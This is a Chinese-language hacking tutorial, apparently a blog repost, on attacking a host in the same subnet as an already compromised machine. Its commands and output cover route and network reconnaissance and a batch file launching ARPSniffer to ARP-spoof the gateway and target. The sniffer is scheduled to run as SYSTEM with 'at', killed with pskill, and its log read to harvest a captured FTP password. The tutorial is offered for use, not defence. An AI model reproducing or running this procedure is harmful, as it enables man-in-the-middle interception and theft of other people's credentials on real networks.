昔日

C段渗透攻击必看的技术知识

╰ァBy﹎冰客

假设想攻击的主机IP是:61.139.1.79

同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆

 

第一步:

tracert 61.139.1.1

 

C:\WIN2000\system32>tracert 61.139.1.1

 

Tracing route to HACK-4FJ7EARC [61.139.1.1]

over a maximum of 30 hops:

 

  1   <10 ms   <10 ms   <10 ms  HACK-4FJ7EARC [61.139.1.1]

 

Trace complete.

 

这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能

进行ARPSNIFFER了

 

第二步:看本机IP设置和网卡情况

C:\WIN2000\system32>ipconfig /all

 

Windows 2000 IP Configuration

 

        Host Name . . . . . . . . . . . . : smscomputer

        Primary DNS Suffix  . . . . . . . :

        Node Type . . . . . . . . . . . . : Broadcast

        IP Routing Enabled. . . . . . . . : No

        WINS Proxy Enabled. . . . . . . . : No

 

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

 

        Connection-specific DNS Suffix  . :

        Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection

        Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6

        DHCP Enabled. . . . . . . . . . . : No

        IP Address. . . . . . . . . . . . : 61.139.1.2

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 61.139.1.65

        DNS Servers . . . . . . . . . . . : 61.139.1.73

 

说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地

方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0

的话也只能嗅探到通过自已的数据哟.

从上面我们还可以知道网关是61.139.1.65

 

第三步:查看本机时间

C:\WIN2000\system32>net time \\127.0.0.1

 

\\127.0.0.1 的当前时间是 2003/1/28 下午 09:13

 

命令完成成功

 

要注意的是这儿的时间是12小时式,用at命令应要24小时式

 

第四步:编写启动ARPsniffer的bat文件

C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat

 

注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

www.netXeyes.com 2002, security@vip.sina.com

 

Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter

Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)

 

Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]

 

第五步:后台运行开始嗅探咯

C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat

 

注意:这儿的时间要用24小时式

     arpsniffer最好拷到system32目录下,记录文件也会生成在这儿

     执行完第四步要先安装WINPCAP 2.1驱动

     同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

 

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉

以SYSTEM权限启动的ARPSniffer程序

C:\winnt\system32>pulist

...................

conime.exe        248  NT AUTHORITY\SYSTEM

explorer.exe      1864 SMSCOMPUTER\Administrator

CSRSS.EXE         2256 NT AUTHORITY\SYSTEM

Arpsniffer.exe    2322 NT AUTHORITY\SYSTEM       ----就是它了!

WINLOGON.EXE      2344 NT AUTHORITY\SYSTEM

......................

 

杀了它

C:\winnt\system32>pskill 2322

PsKill v1.03 - local and remote process killer

Copyright (C) 2000 Mark Russinovich

https://www.sysinternals.com

 

Process 2322 killed.

 

C:\winnt\system32>type 1.txt       我的例子中嗅探的是FTP密码:)

 

...............

61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.188.218.179(1404)->61.139.1.79(21)QUIT

61.188.218.179(1404)->61.139.1.79(21)QUIT

61.139.1.79(21)->61.188.218.179(1404)221

61.139.1.79(21)->61.188.218.179(1404)221

............

............

 

特别要注意的就是PASS哈:)

 

付录:

前台正常执行的显示

 

C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset

 

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

www.netXeyes.com 2002, security@vip.sina.com

 

Network Adapter 0: Intel(R) 8255x Based Network Connection

 

Enable IP Router....OK

 

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02

Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb

Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

 

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88

Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88

有时这儿要先显示can not open driver(0)不管它等一下就可以了

Begin Sniffer.........


评论

热度(8)